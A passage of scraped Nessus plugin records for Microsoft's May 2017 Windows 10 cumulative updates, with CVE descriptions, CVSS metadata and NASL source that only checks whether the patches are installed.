(CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. 
An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019473/windows-10-update-kb4019473\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4763dd01\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019473.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkb = make_list(\n '4019473' # 10 1511\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4019473))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:04", "description": "The remote Windows host is missing 
security update KB4019472. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. 
(CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. 
(CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0221", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019472.NASL", "href": "https://www.tenable.com/plugins/nessus/100059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0221\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n 
\"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98147,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98222,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019472\");\n script_xref(name:\"MSFT\", value:\"MS17-4019472\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4019472. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). 
(CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-0221)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is 